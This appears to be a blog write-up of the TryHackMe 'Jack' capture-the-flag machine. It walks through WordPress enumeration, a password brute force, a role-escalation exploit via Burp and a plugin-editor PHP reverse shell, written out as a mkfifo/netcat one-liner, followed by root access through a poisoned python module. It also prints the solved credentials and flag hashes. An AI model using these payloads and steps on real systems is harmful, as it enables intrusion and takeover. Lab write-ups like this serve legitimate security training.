NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s Jack at

  • Enumeration

As usual we perform nmap scan to identify the running service and all open ports.

:-  nmap -A jack.thm

As nmap scan result show there are two ports are open 80 and 22 and on port 80 wordpress is hosted so we directly go in the way to exploit the wordpress.


Now we start enumeration about wordpress using wpscan .

:- wpscan –url jack.thm -e

Wpscan list out the three users as shown in figure wendy,danny , jack

Now we got the user let bruteforce the password using wpscan .

:-  wpscan –url jack.thm –password /usr/share/wordlist/fasttrack.txt

And after few minutes we got the username and password .

Now let go to wp-login and login with wendy / changelater

After login we get a normal WordPress user and which make a quite complex to get a reverse shell but when you are  a core Pentester then you can easily find the way to penetrate things .

So after good research I found a exploit in searchsploit .

After reading this exploit manually we understand that how we exploit it through burp suite.

This is the parameter which help us to bypass the normal user account to administrator account .

What we done is just simply pass update request and capture it using Burpsuite .

After capturing the request we add a exploit parameter in request and put the value administrator

And on first click It work after forwarding the request we check the  dashboard and we got the administrator account of WordPress and now we can try to get the reverse shell .

Now we have a administrator account so we put some one linear netcat reverse shell code in plugin editor and update it and then activate the plugin and finally we got our shell using netcat .

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 7777 >/tmp/f")?>

After getting the shell i just enumerate all access dir and file and got some file in /var/backups File system . Here I get the private key of the user and I just get the detail of the user by seeing the passwd file which is jack .

Now we have a private key of the user , we can ssh the user easily

:-    ssh -i id_rsa jack@jack.thm

And here we get the user flag , Now our next target is to get root flag .

Privilege Escalation to Root

The machine’s description gives us hints towards what the privilege escalation might be:

escalate your privileges to root using a python module

For this to work there might be a process running on the machine that executes a python script which could be using a module we can poison.

We will use Pspy64 by Dominic Breuker to monitor running processes on the system. First, we will navigate to the /tmp/ directory and transfer pspy64 to the target using a python server and wget.



We will change the permissions on pspy64 so that we can execute it:

And then run pspy64:

From the output we can identify a python script that is running every 2mins:

Let’s check out the /opt/statuscheck/ directory:

We have a script and the output.log file the script creates.

Looking at the script we can see that the only module it is using is the os module:

We now need to find out the location of the module that the script is using. We will check the /usr/lib/ directory for possibilities. We have three options, python2.7, python3 and python3.5:

Using os.system in the script seems likely to be an older Python version so we’ll start with python2.7:

We discover with writable permissions set for our user. Next, we will add a python shell onto the end of our the module code. For this we will use the following:

We add our code to the end of the file:

We save the file and exit, then we setup a netcat listener on our machine:

When the script runs (which will take up to 2 minutes) we are returned a root shell:

Thanks to the machine creator/s for this challenge.

user.txt = 0052f7829e48752f2e7bf50f1231548a
root.txt = b8b63a861cc09e853f29d8055d64bffb

Author – Puckiestyle


Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *